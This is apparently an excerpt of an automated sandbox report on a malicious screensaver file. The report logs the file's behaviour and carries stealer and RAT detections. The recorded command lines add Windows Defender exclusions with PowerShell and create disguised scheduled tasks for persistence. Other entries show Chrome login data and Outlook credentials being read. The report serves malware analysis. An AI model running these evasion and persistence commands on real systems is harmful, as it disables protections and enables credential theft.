                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeThread delayed: delay time: 922337203685477
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess token adjusted: Debug
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory written: C:\Users\user\Desktop\PO#_1100015533.scr base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory written: C:\Users\user\AppData\Roaming\hVVSnrrP.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Users\user\Desktop\PO#_1100015533.scr "C:\Users\user\Desktop\PO#_1100015533.scr"Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe C:\Users\user\AppData\Roaming\hVVSnrrP.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmp2972.tmp"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrQueries volume information: C:\Users\user\Desktop\PO#_1100015533.scr VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeQueries volume information: C:\Users\user\AppData\Roaming\hVVSnrrP.exe VolumeInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformation
                  Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\ehome\ehrecvr.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\ehome\ehsched.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\ieetwcollector.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                  Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                  Searches for Windows Mail specific files
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDirectory queried: C:\Program Files (x86)\Windows Mail\en-US *
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDirectory queried: C:\Program Files (x86)\Windows Mail\en-US NULL
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: Yara matchFile source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.643206935.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Command and Scripting Interpreter                  		1
                  LSASS Driver                  		1
                  LSASS Driver                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		1
                  Taint Shared Content                  		1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Obfuscated Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop Protocol2
                  Email Collection                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Windows Service                  		1
                  Windows Service                  		1
                  Install Root Certificate                  		Security Account Manager2
                  Security Software Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive4
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron11
                  Scheduled Task/Job                  		111
                  Process Injection                  		2
                  Software Packing                  		NTDS1
                  Query Registry                  		Distributed Component Object ModelInput Capture15
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                  Registry Run Keys / Startup Folder                  		11
                  Scheduled Task/Job                  		1
                  Timestomp                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder                  		1
                  DLL Side-Loading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items222
